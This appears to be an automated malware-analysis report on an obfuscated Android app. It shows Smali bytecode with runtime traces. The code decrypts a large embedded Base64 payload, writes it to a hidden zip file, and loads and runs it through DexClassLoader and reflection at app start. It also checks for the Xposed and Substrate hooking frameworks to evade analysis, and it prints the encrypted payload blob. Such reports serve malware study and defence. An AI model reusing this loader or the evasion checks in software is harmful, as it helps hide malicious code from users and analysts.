epsbJ/66CIqj1FlYxfUuW3US2rlkJDH/VKBpC3uKHpCj7/KV2eYCUwfGfdTJpQ8LkHpxGGES6fKJ8xe2loGCNUDz2FZnOIT6/xZgy4me7pxqx6zw/QequyIUG53aev9hLiZ+eCC8K5PrG8J4rP+8jCAik7fhtM/G0SHyaMOJgoj/kmSCaPlDRD5j3aahP3J/BOf7ELs64i16NFCmwCLwya6bDf6OX1ujTMYDcAIusLN+Tqqy0YMuBQNWWSNXDUhJH3AEc5Hgn39X8MSsb+wHwHKOX8xKnid1QEki3FpTpBP3xP+/40p1Ipizz0lvy79kR6rPNPyZy5THq9Qf1uUJ6ugGpZbmWz3vI8xqwayW8OeAgKVNENSNW9NmwnetNfe4ms94acnCgHL7pLyGTvMopOzuz5zBWy7PE4fx5Ftsogv7BUH1QLC4OkGM8maOyhNmdHtqWNQu8VEr+7IJeQlnRugJWtCq7rLJWLYBw0I85sPElmsgnwDeC/ZWRqesFy42THYVGsL8U5Ju8fqBdfJtF7XPoahoH9N29/umaRPM+vN6S+bde6rBN1DbcrYsjd3DpdqgCypJJXXgdA319rrX8W0u8/UeG/l5ik5xryrdl9biFDBoBzPZxyfHeXfBTwIjZO5QAZL6S3oy/y49nepkMplArehvHT8acLJokDqaep4QhSksnfQpO1PksmNK7n5mCzQUuQaHn5zaUGO0aTruejEhVhzv5TZieSdGuo6QGiEo3EnhtW2hxQXVqenXPzRAoB2U8KkFuREuzWnVnUnl3RWtlQXVqcnVp6sdjU21DGhoZNzgGBFsDPAE6EW5lQlL3niwcNk1jUmlDeXZ4QEtjd3U3EnxpRWtlQXRqc3U4TkZjL3tDeXZ4
  • DKcwugYyoEkeAujruiNFcSmCyvx
  • /data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
  • /data/data/com.czybg.eqtbdmzpklrgyns/files
  • etxtfvw/cqwwrwk
  • android.content.Context
  • attachBaseContext
Position Instruction Meta Information
0.param p1, "sJDBHvUYzfgNuHDpgSBSoJcSDOoi" # Landroid/content/Context;
1.prologue
3invoke-super {p0, p1}, Landroid/app/Application;->attachBaseContext(Landroid/content/Context;)V
4const/4 v5, 0x5
5add-int/lit8 v5, v5, 0x1
6add-int/lit8 v5, v5, -0x6
7new-instance v3, Ljava/io/File;
9invoke-virtual {p1}, Landroid/content/Context;->getFilesDir()Ljava/io/File;
10move-result-object v7
12const-string v8, "sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip"
14invoke-direct {v3, v7, v8}, Ljava/io/File;-><init>(Ljava/io/File;Ljava/lang/String;)V
  • Time: 38701
    • This:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files
    • p1: sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
    • Return:
      • /data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
16const-string v7, "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"
18invoke-static {v7, v5}, Landroid/util/Base64;->decode(Ljava/lang/String;I)[B
19move-result-object v2
21const-string v7, "DKcwugYyoEkeAujruiNFcSmCyvx"
23invoke-virtual {v7}, Ljava/lang/String;->getBytes()[B
24move-result-object v7
26invoke-direct {p0, v2, v7}, Lpvsaeqhpgq/zvsin;->xjZRSFXY([B[B)[B
27move-result-object v4
28const/4 v0, 0x0
29try_start_24: new-instance v1, Ljava/io/BufferedOutputStream;
30new-instance v7, Ljava/io/FileOutputStream;
32invoke-direct {v7, v3}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
  • Time: 38725
    • This:
      • java.io.FileOutputStream@1b0e3591
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
    • Return:
      • java.io.FileOutputStream@1b0e3591
34invoke-direct {v1, v7}, Ljava/io/BufferedOutputStream;-><init>(Ljava/io/OutputStream;)V
35try_end_2e:
36invoke-virtual {v1, v4}, Ljava/io/BufferedOutputStream;->write([B)V
38invoke-direct {p0, v1}, Lpvsaeqhpgq/zvsin;->closeStream(Ljava/io/BufferedOutputStream;)V
39new-instance v7, Ldalvik/system/DexClassLoader;
41invoke-virtual {v3}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
42move-result-object v8
44invoke-virtual {p1}, Landroid/content/Context;->getFilesDir()Ljava/io/File;
45move-result-object v9
47invoke-virtual {v9}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
48move-result-object v9
49const/4 v10, 0x0
51invoke-virtual {p1}, Landroid/content/Context;->getClassLoader()Ljava/lang/ClassLoader;
52move-result-object v11
54invoke-direct {v7, v8, v9, v10, v11}, Ldalvik/system/DexClassLoader;-><init>(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Ljava/lang/ClassLoader;)V
  • Time: 43816
    • This:
      • dalvik.system.DexClassLoader[DexPathList[[zip file "/data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
    • p0: /data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip
    • p1: /data/data/com.czybg.eqtbdmzpklrgyns/files
    • p2: null
    • p3: dalvik.system.PathClassLoader[DexPathList[[zip file "/data/app/com.czybg.eqtbdmzpklrgyns-1/base.apk"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
    • Return:
      • dalvik.system.DexClassLoader[DexPathList[[zip file "/data/data/com.czybg.eqtbdmzpklrgyns/files/sBUetYWgmIImLKjScXPAnohMqRUDMHhwvrrmAlCsWZMkmOQFpFwHUl.zip"],nativeLibraryDirectories=[/vendor/lib, /system/lib]]]
56const-string v8, "etxtfvw/cqwwrwk"
58invoke-virtual {v7, v8}, Ldalvik/system/DexClassLoader;->loadClass(Ljava/lang/String;)Ljava/lang/Class;
59move-result-object v7
60const/4 v8, 0x0
61new-array v8, v8, [Ljava/lang/Class;
63invoke-virtual {v7, v8}, Ljava/lang/Class;->getConstructor([Ljava/lang/Class;)Ljava/lang/reflect/Constructor;
64move-result-object v7
65const/4 v8, 0x0
66new-array v8, v8, [Ljava/lang/Object;
68invoke-virtual {v7, v8}, Ljava/lang/reflect/Constructor;->newInstance([Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 43822
    • This:
      • public etxtfvw.cqwwrwk()
    • Return:
      • etxtfvw.cqwwrwk@32c17d93
69move-result-object v7
70iput-object v7, p0, Lpvsaeqhpgq/zvsin;->cdnUnCMxBrmaeu:Ljava/lang/Object;
72iget-object v7, p0, Lpvsaeqhpgq/zvsin;->cdnUnCMxBrmaeu:Ljava/lang/Object;
74invoke-virtual {v7}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
75move-result-object v7
77const-string v8, "attachBaseContext"
78const/4 v9, 0x1
79new-array v9, v9, [Ljava/lang/Class;
80const/4 v10, 0x0
82const-string v11, "android.content.Context"
84invoke-static {v11}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
  • Time: 43833
    • p0: android.content.Context
    • Return:
      • class android.content.Context
      • getName: android.content.Context
85move-result-object v11
86aput-object v11, v9, v10
88invoke-virtual {v7, v8, v9}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
  • Time: 43845
    • This:
      • class etxtfvw.cqwwrwk
      • getName:etxtfvw.cqwwrwk
    • p0: attachBaseContext
    • p1: [Ljava.lang.Class;@3b89dafc
    • p1.Arrays.toString: [class android.content.Context]
    • Return:
      • public void etxtfvw.cqwwrwk.attachBaseContext(android.content.Context)
      • getName: attachBaseContext
89move-result-object v7
91iget-object v8, p0, Lpvsaeqhpgq/zvsin;->cdnUnCMxBrmaeu:Ljava/lang/Object;
92const/4 v9, 0x1
93new-array v9, v9, [Ljava/lang/Object;
94const/4 v10, 0x0
95aput-object p1, v9, v10
97invoke-virtual {v7, v8, v9}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Reflective invoke: etxtfvw.cqwwrwk.attachBaseContext
    • This:
      • etxtfvw.cqwwrwk@32c17d93
    • p0: android.app.ContextImpl@2d30d73d
    • Return:
      • null
  • Time: 55814
    • This:
      • public void etxtfvw.cqwwrwk.attachBaseContext(android.content.Context)
      • getName:attachBaseContext
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@2a9946c4
    • p1.Arrays.toString: [android.app.ContextImpl@2d30d73d]
    • Return:
      • null
98try_end_83: move-object v0, v1
99goto_84: return-void
100catch_85: move-exception v6
101goto_86:
102invoke-virtual {v6}, Ljava/io/FileNotFoundException;->printStackTrace()V
103goto/16 :goto_84
104catch_8a: move-exception v6
105goto_8b:
106invoke-virtual {v6}, Ljava/io/IOException;->printStackTrace()V
107goto/16 :goto_84
108catch_8f: move-exception v6
109goto_90:
110invoke-virtual {v6}, Ljava/lang/InstantiationException;->printStackTrace()V
111goto/16 :goto_84
112catch_94: move-exception v6
113goto_95:
114invoke-virtual {v6}, Ljava/lang/reflect/InvocationTargetException;->printStackTrace()V
115goto/16 :goto_84
116catch_99: move-exception v6
117goto_9a:
118invoke-virtual {v6}, Ljava/lang/NoSuchMethodException;->printStackTrace()V
119goto/16 :goto_84
120catch_9e: move-exception v6
121goto_9f:
122invoke-virtual {v6}, Ljava/lang/IllegalAccessException;->printStackTrace()V
123goto/16 :goto_84
124catch_a3: move-exception v6
125goto_a4:
126invoke-virtual {v6}, Ljava/lang/ClassNotFoundException;->printStackTrace()V
127goto/16 :goto_84
128catch_a8: move-exception v6
129move-object v0, v1
130goto/16 :goto_a4
131catch_ab: move-exception v6
132move-object v0, v1
133goto/16 :goto_9f
134catch_ae: move-exception v6
135move-object v0, v1
136goto/16 :goto_9a
137catch_b1: move-exception v6
138move-object v0, v1
139goto/16 :goto_95
140catch_b4: move-exception v6
141move-object v0, v1
142goto/16 :goto_90
143catch_b7: move-exception v6
144move-object v0, v1
145goto/16 :goto_8b
146catch_ba: move-exception v6
147move-object v0, v1
148goto/16 :goto_86
Cross References
APIs
  • java.lang.Exception.<init>
  • java.lang.Exception.getStackTrace
  • java.lang.StackTraceElement.getClassName
  • java.lang.String.equals
  • java.lang.StackTraceElement.getClassName
  • java.lang.String.equals
  • java.lang.StackTraceElement.getMethodName
  • java.lang.String.equals
  • java.lang.StackTraceElement.getClassName
  • java.lang.String.equals
  • java.lang.StackTraceElement.getMethodName
  • java.lang.String.equals
  • java.lang.StackTraceElement.getClassName
  • java.lang.String.equals
  • java.lang.StackTraceElement.getMethodName
  • java.lang.String.equals
  • java.io.File.<init>
  • java.io.File.exists
Strings
  • blah
  • com.android.internal.os.ZygoteInit
  • com.saurik.substrate.MS$2
  • invoked
  • de.robv.android.xposed.XposedBridge
  • main
  • handleHookedMethod
  • /system/framework/XposedBridge.jar
Position Instruction Meta Information
0.prologue
1const/4 v4, 0x1
2try_start_1: new-instance v5, Ljava/lang/Exception;
4const-string v6, "blah"
6invoke-direct {v5, v6}, Ljava/lang/Exception;-><init>(Ljava/lang/String;)V
7throw v5
8catch_9: move-exception v0
9const/4 v3, 0x0
11invoke-virtual {v0}, Ljava/lang/Exception;->getStackTrace()[Ljava/lang/StackTraceElement;
12move-result-object v6
13array-length v7, v6
14const/4 v5, 0x0
15goto_11: if-ge v5, v7, :cond_72
16aget-object v1, v6, v5
18invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
19move-result-object v8
21const-string v9, "com.android.internal.os.ZygoteInit"
23invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
24move-result v8
25if-eqz v8, :cond_27
26add-int/lit8 v3, v3, 0x1
27const/4 v8, 0x2
28if-ne v3, v8, :cond_27
29cond_26: return v4
30cond_27:
31invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
32move-result-object v8
34const-string v9, "com.saurik.substrate.MS$2"
36invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
37move-result v8
38if-eqz v8, :cond_3f
40invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getMethodName()Ljava/lang/String;
41move-result-object v8
43const-string v9, "invoked"
45invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
46move-result v8
47if-nez v8, :cond_26
48cond_3f:
49invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
50move-result-object v8
52const-string v9, "de.robv.android.xposed.XposedBridge"
54invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
55move-result v8
56if-eqz v8, :cond_57
58invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getMethodName()Ljava/lang/String;
59move-result-object v8
61const-string v9, "main"
63invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
64move-result v8
65if-nez v8, :cond_26
66cond_57:
67invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getClassName()Ljava/lang/String;
68move-result-object v8
70const-string v9, "de.robv.android.xposed.XposedBridge"
72invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
73move-result v8
74if-eqz v8, :cond_6f
76invoke-virtual {v1}, Ljava/lang/StackTraceElement;->getMethodName()Ljava/lang/String;
77move-result-object v8
79const-string v9, "handleHookedMethod"
81invoke-virtual {v8, v9}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
82move-result v8
83if-nez v8, :cond_26
84cond_6f: add-int/lit8 v5, v5, 0x1
85goto/16 :goto_11
86cond_72: new-instance v2, Ljava/io/File;
88const-string v4, "/system/framework/XposedBridge.jar"
90invoke-direct {v2, v4}, Ljava/io/File;-><init>(Ljava/lang/String;)V
92invoke-virtual {v2}, Ljava/io/File;->exists()Z
  • Time: 43861
    • This:
      • /system/framework/XposedBridge.jar
    • Return:
      • false
93move-result v4
94goto/16 :goto_26
Cross References
APIs
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • etxtfvw.cqwwrwk.unFeJNljZsjaw
  • java.lang.Class.forName
  • java.lang.Class.getConstructor
  • java.lang.reflect.Constructor.newInstance
Strings
  • /lib
  • BxAbARscRRAIBAMXGkUnFA80HhYYED0YFhYSGQ==
  • dalvik.system.DexClassLoader
  • CRABFlwbCg0WWSQGBQINFg==
  • java.lang.String
  • CRABFlwbCg0WWTQeFhgQPRgWFhIZ
  • java.lang.ClassLoader
